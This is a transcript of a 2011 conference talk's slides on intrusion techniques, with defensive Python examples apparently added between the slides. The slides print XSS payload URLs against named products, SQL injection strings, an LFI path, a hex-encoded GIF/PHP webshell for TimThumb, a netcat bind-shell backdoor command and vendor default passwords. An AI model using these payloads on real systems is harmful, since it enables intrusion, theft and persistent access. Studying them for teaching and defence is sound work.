Vale Security Conference - 2011 - 4 - Ewerson Guimarães (Crash) [DC Labs]


Vale Security Conference - 2011
Saturday - 4th talk
Speaker: Ewerson Guimarães (Crash)
Talk: Intrusion techniques - Open source tools
Twitter (Ewerson Guimarães): !/crashbrz
Video of the talk (YouTube):
Slides (SlideShare):

Published in: Technology



  1. Intrusion Techniques - DcLabs Hacking Tour 2011. Ewerson Guimarães (Crash), DcLabs – HackingTour 2011
  2. Agenda: Fingerprinting, Web vulnerabilities, Backdoors, Brute force, Shellcode, Exploits, Scanners
  3. FingerPrint
     Grab information about a target host. It is used to identify the operating system and/or service (daemon) version number from unique characteristics of the TCP/IP responses.
     The best tool for discovering operating systems, services, devices and more: NMAP (Network Mapper).
     Basic commands:
     nmap host (basic)
     nmap -sV host (service versions)
     nmap -PN host (ignore ICMP echo-reply)
     nmap -O host (try to grab the O.S. version)
     nmap -f host (firewall/IDS/IPS evasion)
  4. Passive FingerPrint
     • TTL - the Time To Live the operating system sets on the outbound packet.
     • Window Size - the TCP window size the operating system sets.
     • DF - whether the operating system sets the Don't Fragment bit.
     • TOS - whether the operating system sets the Type of Service, and if so, to what value.
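The four fields on the passive-fingerprint slide are enough to build a small classifier, which is what passive tools such as p0f do at scale. The following is an added example written for this page, not code from the talk or from any DcLabs tool: it rounds an observed TTL up to the nearest common initial TTL (64, 128, 255 are well-documented defaults), derives the hop distance, and looks the (initial TTL, window size, DF) tuple up in a signature table. The window-size entries in that table are constructed illustrations, not an authoritative signature database, and `SynObservation` is a name chosen here.

```python
from dataclasses import dataclass

# Default initial TTLs used by the common OS families.
INITIAL_TTLS = (64, 128, 255)

# Constructed signature table: (initial_ttl, window_size, df) -> label.
# Assumption: these window sizes are illustrative only; real tools carry
# thousands of entries and also use option ordering, MSS and TOS.
SIGNATURES = {
    (64, 29200, True): "Linux (recent kernel)",
    (64, 5840, True): "Linux (older 2.x kernel)",
    (64, 65535, True): "FreeBSD/macOS",
    (128, 8192, True): "Windows (Vista/7 era)",
    (128, 65535, True): "Windows (XP/2003 era)",
    (255, 4128, False): "Cisco IOS",
}

# Coarse guess when only the TTL family matches.
FALLBACK = {
    64: "Unix-like (unknown)",
    128: "Windows (unknown)",
    255: "Network device/Solaris (unknown)",
}


@dataclass
class SynObservation:
    """Fields a passive sensor records from one SYN packet (hypothetical type)."""
    ttl: int        # TTL as seen on the wire, already decremented by routers
    window: int     # TCP window size advertised in the SYN
    df: bool        # Don't Fragment bit
    tos: int = 0    # Type of Service byte (kept for completeness)


def initial_ttl(observed_ttl: int) -> int:
    """Round an observed TTL up to the nearest default initial TTL."""
    for candidate in INITIAL_TTLS:
        if observed_ttl <= candidate:
            return candidate
    raise ValueError("TTL outside the 8-bit range")


def hop_distance(observed_ttl: int) -> int:
    """How many routers the packet crossed, assuming a default initial TTL."""
    return initial_ttl(observed_ttl) - observed_ttl


def guess_os(obs: SynObservation) -> str:
    key = (initial_ttl(obs.ttl), obs.window, obs.df)
    return SIGNATURES.get(key, FALLBACK[key[0]])


if __name__ == "__main__":
    # Constructed observations, as a passive sensor on the LAN might record them.
    samples = (
        SynObservation(ttl=57, window=29200, df=True),
        SynObservation(ttl=120, window=8192, df=True),
        SynObservation(ttl=251, window=4128, df=False),
    )
    for obs in samples:
        print(obs, "->", guess_os(obs), f"({hop_distance(obs.ttl)} hops away)")
```

Because no packet is sent, this is the kind of inventory a defender can run continuously on a span port: an unexpected OS family on a subnet, or a hop distance that does not match the network layout, is worth a look.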
  5. FingerPrint: Matrix
  6. FingerPrint: U. Bourne
  7. FingerPrint: in BackTrack Linux you can find many tools for fingerprinting. http://www.backtrack-linux.com
  8. Web Vulnerability
     These vulnerabilities are initially exploited through malicious browser requests, compromising the target in a matter of minutes.
     Cross Site Scripting (XSS) – Reflected / Stored
     SQL-Injection
     PHP (LFI / RFI / AFU / RCE)
  9. Web Vulnerability
     Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables malicious attackers to inject client-side script into web pages viewed by other users.
     Spekx – Knowledge Base: http://server/pls/ksp_acesso.login_script?p_time=%221%22%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
     LMS Web Ensino – TOTVS: http://site/lms/sistema/webensino/index.php?modo=resbusca_biblioteca&pChave=a%22%2F%3E+%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E&Submit=Buscar
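Both URLs on the slide work the same way: the application takes a query parameter and writes it back into the page unchanged. The example below is added for this page (it is not code from the talk or from either product named): it decodes a request shaped like the slide's LMS URL, then renders the search term the two ways an application could, once by string interpolation and once through `html.escape`, so the difference between the vulnerable and the hardened page is visible. The parameter name `pChave` is taken from the slide; the page templates and the `contains_script_tag` helper are assumptions made here.

```python
import html
from urllib.parse import parse_qs, urlsplit

# Constructed request with the same shape as the slide's LMS example
# (query value URL-encoded, '+' standing for a space).
REQUEST = (
    "http://site/lms/sistema/webensino/index.php?modo=resbusca_biblioteca"
    "&pChave=a%22%2F%3E+%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E&Submit=Buscar"
)


def search_term(url: str) -> str:
    """Extract the user-controlled search term the page reflects back."""
    return parse_qs(urlsplit(url).query).get("pChave", [""])[0]


def render_vulnerable(term: str) -> str:
    # Reflects the raw term into an attribute value and into the body.
    # The '"/>' in the payload closes the attribute and the tag, and the
    # browser then parses the <script> element that follows.
    return f'<input name="pChave" value="{term}"/> results for {term}'


def render_hardened(term: str) -> str:
    # html.escape(quote=True) turns <, >, &, " and ' into entities, so the
    # browser shows the characters as text and never builds an element.
    safe = html.escape(term, quote=True)
    return f'<input name="pChave" value="{safe}"/> results for {safe}'


def contains_script_tag(markup: str) -> bool:
    """Cheap response-side check: is there a live <script> element in the output?"""
    return "<script" in markup.lower()


if __name__ == "__main__":
    term = search_term(REQUEST)
    print("decoded term :", term)
    print("vulnerable   :", render_vulnerable(term))
    print("hardened     :", render_hardened(term))
```

Contextual escaping at output time is the fix the slide's examples call for; input filtering alone is brittle because the same value may be rendered into HTML text, an attribute, and a script block, each with its own escaping rules.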
  10. Web Vulnerability: Reflected / Stored XSS DEMO
  11. Web Vulnerability
  12. What is the impact? Why? Examples?
  13. Web Vulnerability - SQL-Injection
      It occurs when the attacker can insert a series of SQL statements into a query by manipulating the data the application accepts as input.
      SELECT fields FROM table WHERE field = '';
      Injected string: some' OR 'x'='x
      SELECT fields FROM table WHERE field = 'some' OR 'x'='x';
      Classic injection strings: admin'--, " or 0=0 #, or 1=1--, hi' or 'a'='a, ' or 0=0 --, or 0=0 #, " or 1=1--, hi') or ('a'='a, " or 0=0 --, ' or 'x'='x, or 1=1--, hi") or ("a"="a, or 0=0 --, " or "x"="x, or a=a--, ');Drop table x;--, ' or 0=0 #, ') or ('x'='x, hi" or 1=1 --, ') or ('a'='a
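The slide's `some' OR 'x'='x` string only works when the application builds the query by gluing the input into the SQL text. The following added example (written for this page, not from the talk or the OCOMON demo) shows the two lookups side by side against an in-memory SQLite table: the interpolated version returns every row for the injected input, the parameterized version returns none, because the driver ships the value separately from the statement and a quote inside it is just data. Table and column names are constructed for the example.

```python
import sqlite3
from typing import List


def make_db() -> sqlite3.Connection:
    """Constructed sample table standing in for the application's user store."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, secret TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("alice", "s1"), ("bob", "s2"), ("carol", "s3")],
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, name: str) -> List[str]:
    # Mirrors the slide: the input becomes part of the SQL text, so a quote in
    # it ends the literal and the rest is parsed as SQL.
    query = f"SELECT name FROM users WHERE name = '{name}'"
    return [row[0] for row in conn.execute(query)]


def lookup_parameterized(conn: sqlite3.Connection, name: str) -> List[str]:
    # The statement is fixed; the value travels as a bound parameter and can
    # never change the query's structure.
    rows = conn.execute("SELECT name FROM users WHERE name = ?", (name,))
    return [row[0] for row in rows]


if __name__ == "__main__":
    db = make_db()
    injected = "some' OR 'x'='x"          # the string from the slide
    print("vulnerable   :", lookup_vulnerable(db, injected))
    print("parameterized:", lookup_parameterized(db, injected))
    print("legit lookup :", lookup_parameterized(db, "bob"))
```

The same rule covers every string on the slide's list: once the query is parameterized there is nothing left for `'--`, `OR 1=1` or a stacked `DROP` to attach to, and a web application firewall rule is then only a second layer rather than the fix.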
  14. SQL-Injection LIVE DEMO: OCOMON. Throwing fudge at the fan.
  15. Web Vulnerability - CGI/PHP Command Injection
      It occurs when the attacker inserts a series of commands, exploiting vulnerable CGI/PHP scripts.
      OneorZero – AFU + LFI: http://server/oneorzero/index.php?controller=../[FILE].php
      WordPress TimThumb (theme) plugin – RCE, payload as hex bytes:
      x47x49x46x38x39x61x01x00x01x00x80x00x00 xFFxFFxFFx00x00x00x21xF9x04x01x00x00x00 x00x2Cx00x00x00x00x01x00x01x00x00x02x02 x44x01x00x3Bx00x3Cx3Fx70x68x70x20x40x65 x76x61x6Cx28x24x5Fx47x45x54x5Bx27x63x6D x64x27x5Dx29x3Bx20x3Fx3Ex00
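The two bugs on this slide have two distinct server-side fixes: the `controller=../` case is solved by never turning a request parameter into a path, and the TimThumb case by refusing uploads that are not purely the image format they claim to be. This added example (written for this page; not code from OneorZero, TimThumb or the talk) implements both checks: an allow-list resolver for controller names with a normalised-path guard as a second layer, and a GIF validator that rejects anything carrying PHP or script markers after the image. The directory `/srv/app/controllers`, the sample GIF bytes and the appended marker are constructed for the demonstration.

```python
import posixpath
import re
from typing import Optional

# --- Local file inclusion: controller=<name> ---------------------------------

CONTROLLER_DIR = "/srv/app/controllers"            # assumed application layout
CONTROLLER_NAME = re.compile(r"[a-z][a-z0-9_]{0,31}")  # allow-list, no dots or slashes


def resolve_controller(name: str) -> Optional[str]:
    """Map a request parameter to a file under CONTROLLER_DIR, or refuse."""
    if CONTROLLER_NAME.fullmatch(name) is None:
        return None
    candidate = posixpath.normpath(posixpath.join(CONTROLLER_DIR, f"{name}.php"))
    # Defence in depth: even if the regex is loosened later, the normalised
    # path must still sit inside CONTROLLER_DIR (normpath collapses '..').
    if not candidate.startswith(CONTROLLER_DIR + "/"):
        return None
    return candidate


# --- Polyglot upload: GIF header followed by PHP ------------------------------

GIF_MAGIC = (b"GIF87a", b"GIF89a")
CODE_MARKERS = (b"<?php", b"<?=", b"<script")

# Constructed 1x1 GIF: header, global palette, graphic control ext., image
# descriptor, one LZW block, 0x3B trailer.
CLEAN_GIF = (
    b"GIF89a\x01\x00\x01\x00\x80\x00\x00\xff\xff\xff\x00\x00\x00"
    b"\x21\xf9\x04\x01\x00\x00\x00\x00"
    b"\x2c\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02\x44\x01\x00\x3b"
)
# Constructed polyglot for the test: the valid GIF with a harmless PHP
# fragment appended after the trailer (a real sample would carry a webshell).
POLYGLOT_GIF = CLEAN_GIF + b"\x00<?php echo 'constructed marker'; ?>\x00"


def is_clean_gif(data: bytes) -> bool:
    """True only for a file that starts like a GIF and carries no code markers."""
    if not data.startswith(GIF_MAGIC):
        return False
    lowered = data.lower()
    return not any(marker in lowered for marker in CODE_MARKERS)


if __name__ == "__main__":
    for name in ("home", "../../etc/passwd", "Home", "index.php"):
        print(f"controller={name!r:22} -> {resolve_controller(name)}")
    print("clean gif accepted :", is_clean_gif(CLEAN_GIF))
    print("polyglot accepted  :", is_clean_gif(POLYGLOT_GIF))
```

Marker scanning is a cheap first gate; re-encoding every accepted image with an image library (which drops trailing bytes) and serving uploads from a directory where the web server never executes scripts close the gap that the marker list alone leaves.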
  16. Default/Weak passwords
      Default passwords are set by the manufacturer/developer and were not changed after installation/configuration. They are supplied by the system vendor and meant to be changed at installation time (nobody does this shit).
      Ex: 3Com switch: user security, pass security. Firebird: user sysdba, pass masterkey.
      Weak: passwords that are easily guessed or follow a keyboard sequence.
      Ex: 123456 - love - house phone number - birthday - etc.
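Every weakness the slide names can be checked before a password is accepted. The added example below (written for this page, not from the talk) audits a credential pair against the two vendor defaults the slide lists, a short common-password list, keyboard-row sequences such as `123456`, and personal data such as a phone number or birth year supplied by the caller. The `audit_password` function name, the severity wording and the sample profile are constructed for the example; the default-credential table contains only the two entries the slide gives.

```python
from typing import Dict, List, Optional

# Vendor defaults named on the slide: (username, password) -> description.
DEFAULT_CREDENTIALS = {
    ("security", "security"): "3Com switch default account",
    ("sysdba", "masterkey"): "Firebird default SYSDBA password",
}

# Small constructed list; a real deployment would use a breach corpus.
COMMON_PASSWORDS = {"123456", "password", "love", "qwerty", "admin"}

KEYBOARD_ROWS = ("1234567890", "qwertyuiop", "asdfghjkl", "zxcvbnm")
MIN_LENGTH = 12


def has_keyboard_sequence(password: str, run: int = 4) -> bool:
    """True if any `run` adjacent keys of one keyboard row (either direction) appear."""
    p = password.lower()
    for row in KEYBOARD_ROWS:
        for i in range(len(row) - run + 1):
            chunk = row[i:i + run]
            if chunk in p or chunk[::-1] in p:
                return True
    return False


def audit_password(user: str, password: str,
                   profile: Optional[Dict[str, str]] = None) -> List[str]:
    """Return a list of findings; an empty list means no weakness detected."""
    findings = []
    if (user.lower(), password) in DEFAULT_CREDENTIALS:
        findings.append("default credential: " + DEFAULT_CREDENTIALS[(user.lower(), password)])
    if password.lower() in COMMON_PASSWORDS:
        findings.append("common password")
    if has_keyboard_sequence(password):
        findings.append("keyboard sequence")
    if len(password) < MIN_LENGTH:
        findings.append(f"shorter than {MIN_LENGTH} characters")
    if user and user.lower() in password.lower():
        findings.append("contains the username")
    for label, value in (profile or {}).items():
        if value and value.lower() in password.lower():
            findings.append(f"contains personal data ({label})")
    return findings


if __name__ == "__main__":
    # Constructed profile data of the kind the slide lists as guessable.
    profile = {"house phone": "987654321", "birth year": "1985"}
    for user, pw in (("sysdba", "masterkey"), ("bob", "123456"),
                     ("ann", "ann1985!x"), ("ann", "orchid-lantern-42-quartz")):
        print(f"{user}/{pw}: {audit_password(user, pw, profile) or 'ok'}")
```

The same function can run as a scheduled job over a service inventory (with the vendor-default table extended from the devices actually deployed), which catches the "never changed after installation" case the slide describes without any guessing against the live service.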
  17. Brute Force
      It consists of using random combinations of characters, numbers and symbols, wordlists and/or string generators to crack a password.
      Ex: John the Ripper, Hydra, SSH brute force.
  18. Brute Force - DirBuster: DirBuster is a multi-threaded Java application designed to brute force directory and file names on web/application servers.
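Online brute force of the kind the two slides above describe (Hydra against SSH, DirBuster against a web server) leaves a very regular trace: many failures from one source in a short window, often against many account names. This added example (written for this page; not part of the talk or of any of the tools named) parses constructed OpenSSH `Failed password` log lines, counts failures per source address over a sliding 60-second window, and lists the accounts a flagged source tried. The log lines, host name and addresses are constructed sample data; the threshold and window are assumptions to be tuned per site.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, Iterator, List, Tuple

# Constructed auth log: one noisy source (203.0.113.5) and one user who
# mistyped a password twice, 25 minutes apart (198.51.100.9).
AUTH_LOG = """\
Jun 12 10:01:02 bastion sshd[1001]: Failed password for invalid user admin from 203.0.113.5 port 51234 ssh2
Jun 12 10:01:05 bastion sshd[1002]: Failed password for root from 203.0.113.5 port 51236 ssh2
Jun 12 10:01:09 bastion sshd[1003]: Failed password for invalid user oracle from 203.0.113.5 port 51240 ssh2
Jun 12 10:01:14 bastion sshd[1004]: Failed password for invalid user test from 203.0.113.5 port 51244 ssh2
Jun 12 10:01:20 bastion sshd[1005]: Failed password for root from 203.0.113.5 port 51250 ssh2
Jun 12 10:01:27 bastion sshd[1006]: Failed password for invalid user guest from 203.0.113.5 port 51255 ssh2
Jun 12 10:05:41 bastion sshd[1010]: Failed password for alice from 198.51.100.9 port 40001 ssh2
Jun 12 10:05:49 bastion sshd[1011]: Accepted password for alice from 198.51.100.9 port 40001 ssh2
Jun 12 10:30:12 bastion sshd[1020]: Failed password for alice from 198.51.100.9 port 40120 ssh2
"""

FAILED = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def failed_logins(log: str) -> Iterator[Tuple[datetime, str, str]]:
    """Yield (timestamp, user, source ip) for every failed-password line."""
    for line in log.splitlines():
        m = FAILED.match(line)
        if m:
            # syslog timestamps carry no year; only deltas matter here.
            yield datetime.strptime(m["ts"], "%b %d %H:%M:%S"), m["user"], m["ip"]


def brute_force_sources(log: str, threshold: int = 5,
                        window: timedelta = timedelta(seconds=60)) -> Dict[str, int]:
    """Sources with at least `threshold` failures inside any `window`; value is the peak count."""
    per_ip: Dict[str, List[datetime]] = defaultdict(list)
    for ts, _, ip in failed_logins(log):
        per_ip[ip].append(ts)
    flagged = {}
    for ip, times in per_ip.items():
        times.sort()
        best = start = 0
        for end in range(len(times)):            # two-pointer sliding window
            while times[end] - times[start] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            flagged[ip] = best
    return flagged


def targeted_accounts(log: str, ip: str) -> List[str]:
    """Distinct account names a source tried; many names means a wordlist, not a typo."""
    return sorted({user for _, user, src in failed_logins(log) if src == ip})


if __name__ == "__main__":
    for ip, count in brute_force_sources(AUTH_LOG).items():
        print(f"{ip}: {count} failures within 60s, accounts: {targeted_accounts(AUTH_LOG, ip)}")
```

The account list is what separates a brute-force source from a forgetful user: a handful of failures against one real account is a help-desk ticket, while failures across `admin`, `root`, `oracle` and `test` from one address is a wordlist, and the right response is rate limiting or a temporary block on that source together with key-only authentication on the service.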
  19. Exploits
      Kinds of exploits:
      Local: usually the objective of a local exploit is to elevate the user's privileges on the machine as close as possible to root (uid=0) or Administrator. They are written to exploit kernel bugs or suid binaries.
      Remote: works over a network connection and exploits the vulnerable target without any prior access to it.
      www.securityfocus.com, www.secunia.com, www.exploit-db.com
      0-days: usually an unpublished exploit for a brand new vulnerability. You can buy them! $$$$$
  20. Exploits: If the kernel was patched? Will we cry? Alexos =>
  21. Exploits: No!!!! Fuck him!!! We have other ways to pwn the box: GNU C library dynamic linker, suids, etc...
  22. Backdoors/RootKits
      Used to maintain access to the system. We can use Netcat for this purpose:
      nc -vlp 5555 -e /bin/bash
      PHP - ASP - JSP
      RootKits: the main purpose of a rootkit is to hide the attacker's presence by replacing vital system binaries on the target system. Examples: hide files (matching strings), run a command when strings match, hide processes, hide open ports, and others.
  23. Scanners/Fuzzers
      There are 2 types of scanners: specific ones, written for a specific vulnerability (BSQLHacker, SQLMAP), and generic ones, written for various kinds of vulnerabilities. Generic scanners use known service banners/strings to locate potential targets/vulnerabilities. W3af, Nessus.
  24. Scanners/Fuzzers
  25. Scanners/Fuzzers
  26. Sniffers: a sniffer monitors and analyzes network traffic. Some of these packets may contain critical information (such as logins, passwords and cool infos). Wireshark -
  27. MetaSploit
  28. MetaSploit: Let's Fuck Windows?
  29. Hardening your server: HnTool is an open source (GPLv2) hardening tool for Unix. It scans your system for vulnerabilities or problems in configuration files, allowing you to get a quick overview of the security status of your system.
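A configuration scanner of the kind the slide describes is mostly a parser plus a baseline of expected values. The added example below is written for this page and is not HnTool's code: it parses an `sshd_config`-style file (first occurrence of a directive wins, as in OpenSSH; `#` comments and `Key=value` spelling handled) and reports every directive that departs from a small constructed baseline, with a severity. The sample config and the baseline's severities and wording are assumptions; the directive names and values are real OpenSSH ones.

```python
import re
from typing import Dict, List, Tuple

# Constructed sshd_config excerpt with several weak settings.
SSHD_CONFIG = """\
# constructed sample, not a real host's file
Port 22
PermitRootLogin yes
PasswordAuthentication yes
PermitRootLogin no          # ignored: sshd keeps the first occurrence
PermitEmptyPasswords no
X11Forwarding=yes
Protocol 2
"""

# Baseline: directive -> (required value, severity, rationale). Constructed
# for the example; a real tool ships a much longer, versioned list.
BASELINE = {
    "PermitRootLogin": ("no", "high", "log in as an unprivileged user and escalate with sudo"),
    "PasswordAuthentication": ("no", "medium", "keys only removes the password brute-force surface"),
    "PermitEmptyPasswords": ("no", "high", "empty passwords are an open door"),
    "X11Forwarding": ("no", "low", "disable unless X11 forwarding is actually needed"),
    "Protocol": ("2", "high", "SSH protocol 1 is cryptographically broken"),
}


def parse_sshd_config(text: str) -> Dict[str, str]:
    """Return {directive (lowercase): value}, keeping the first occurrence."""
    directives: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()       # drop comments and blanks
        if not line:
            continue
        parts = re.split(r"[\s=]+", line, maxsplit=1)  # "Key value" or "Key=value"
        if len(parts) == 2:
            directives.setdefault(parts[0].lower(), parts[1].strip())
    return directives


def check_sshd(text: str) -> List[Tuple[str, str, str]]:
    """List of (severity, directive, detail) for every deviation from BASELINE."""
    found = parse_sshd_config(text)
    findings = []
    for directive, (wanted, severity, why) in BASELINE.items():
        actual = found.get(directive.lower())
        if actual is None:
            findings.append(("info", directive, f"not set; compiled-in default applies ({why})"))
        elif actual.lower() != wanted:
            findings.append((severity, directive, f"is '{actual}', want '{wanted}': {why}"))
    return findings


if __name__ == "__main__":
    for severity, directive, detail in check_sshd(SSHD_CONFIG):
        print(f"[{severity:6}] {directive}: {detail}")
```

Keeping the baseline as data rather than code is what makes such a tool maintainable: the same `check_sshd` loop serves an entire fleet, and a reviewed change to the baseline is a policy change rather than a code change.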
  30. Questions?
  31. Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  32. Contact: Crash - IRC: #dclabs, Twitter: @crashbrz